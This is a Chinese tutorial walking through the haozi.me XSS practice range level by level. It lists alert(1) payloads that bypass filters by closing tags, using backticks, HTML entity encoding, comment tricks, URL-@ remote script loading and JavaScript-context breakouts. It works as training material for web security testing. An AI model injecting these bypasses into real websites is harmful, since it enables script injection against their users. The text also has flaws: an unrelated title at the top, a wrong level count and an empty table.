企业官网建设流程全解析

XSS靶场通关实战：从基础注入到高级绕过的思维跃迁

在Web安全领域，跨站脚本攻击（XSS）始终是渗透测试中最常见也最具破坏力的漏洞之一。对于初学者而言，理解XSS原理只是第一步，真正掌握防御规避技巧需要在实战中不断磨练。haozi.me靶场精心设计了从易到难的13道关卡（0x00-0x12），每关都模拟了真实场景中的过滤机制。本文将带你系统性地拆解这些防御层，不仅提供通关payload，更重要的是揭示每个关卡背后的安全逻辑和思维突破点。

1. 基础标签注入与闭合技巧

1.1 0x00关卡：最基础的img标签利用

当靶场没有任何过滤时，最简单的XSS注入方式就是使用带有事件处理函数的HTML标签：

<img src="任意图片地址" onerror="alert(1)">

这里的onerror事件会在图片加载失败时触发，是现代浏览器中最常用的XSS测试向量之一。初学者需要理解几个关键点：

• 标签选择：<img>、<svg>等不需要闭合的标签在注入时更不容易破坏页面结构
• 事件选取：除了onerror，还有onload、onmouseover等50多种事件可用
• 执行上下文：确认代码是在HTML解析阶段执行，而非JavaScript运行时

1.2 0x01-0x02关卡：标签闭合的艺术

当输入被包裹在<textarea>或<input>标签中时，需要先闭合宿主标签：

</textarea><img src=x onerror=alert(1)> "<img src=x onerror=alert(1)>

关键突破点：

• 查看页面源码确定上下文环境
• 在Chrome开发者工具中观察DOM结构变化
• 理解HTML解析器的tokenization过程

2. 特殊字符的规避策略

2.1 0x03-0x04关卡：括号与符号的替代方案

当圆括号被过滤时，可以用反引号实现模板字符串调用：

<img src=x onerror=alert`1`>

更进一步过滤时，HTML实体编码是可靠选择：

<img src=x onerror=alert&#40;1&#41;>

编码技巧对比表：

2.2 0x05关卡：注释符的妙用

HTML注释符可以用于终止之前的代码段：

--!><img src=x onerror=alert&#40;1&#41;>

3. 属性与协议级别的绕过

3.1 0x06-0x07关卡：input标签的变形利用

当常规标签被过滤时，可以尝试改变标签属性：

type="image" src=x onerror=alert(1)

对于严格的正则过滤，移除闭合符号可能有效：

<img src=x onerror=alert&#40;1&#41;

3.2 0x09-0x0A关卡：URL解析的边界情况

利用URL解析特性构造特殊格式：

https://example.com"</script><img src=x onerror=alert(1)

或者使用@符号改变URL解析路径：

https://example.com@xss.haozi.me/j.js

4. 高级编码与语法技巧

4.1 0x0B关卡：全大写过滤的应对

当内容被强制转为大写时，HTML实体编码依然有效：

<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

4.2 0x0D-0x0F关卡：JavaScript上下文注入

在JS代码段中需要闭合原有语句：

');alert(1)//

或者利用分号实现语句分隔：

0;alert(1)

5. 终极挑战：多重编码组合

5.1 0x12关卡：转义字符的深层处理

当引号被转义时，需要自身进行转义：

\");alert(1);//

浏览器差异注意事项：

• Firefox对某些编码的解析更宽松
• Chrome的XSS Auditor可能拦截部分简单payload
• Edge对文档模式敏感

在实战中，建议准备多个浏览器进行交叉测试。每个payload背后都体现着对HTML解析器、JavaScript引擎的深刻理解。记住，XSS的本质是"让浏览器以非预期的方式解析内容"，这需要我们对Web技术的各个层面都有扎实的掌握。